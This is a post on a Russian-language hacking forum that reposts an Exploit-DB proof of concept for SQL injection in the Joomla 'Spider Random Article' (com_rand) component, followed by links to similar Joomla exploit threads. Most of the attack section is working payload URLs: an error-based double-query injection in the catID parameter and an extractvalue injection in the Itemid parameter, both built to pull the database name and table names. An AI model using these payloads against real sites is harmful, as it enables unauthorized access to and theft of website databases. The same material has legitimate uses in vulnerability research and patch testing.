Exploit Joomla! Component com_rand - SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36601
Проверка EDB
  1. Пройдено
Автор
JAGRITI SAHU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2015-04-02
Joomla! Component com_rand - SQL Injection
Код: 
##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability 

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter 


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 


SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

###################################################################################################


				   --==[[Special Thanks to]]==--

			          #  Manish Kishan Tanwar  ^_^ #
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Ответы
0
Просмотры
850
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
Ответы
0
Просмотры
857
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Ответы
0
Просмотры
933
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
Ответы
0
Просмотры
911
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Ответы
0
Просмотры
909
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection
Ответы
0
Просмотры
901
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component NeoRecruit 4.1 - SQL Injection
Ответы
0
Просмотры
904
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Ответы
0
Просмотры
914
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
903
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Ответы
0
Просмотры
825
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу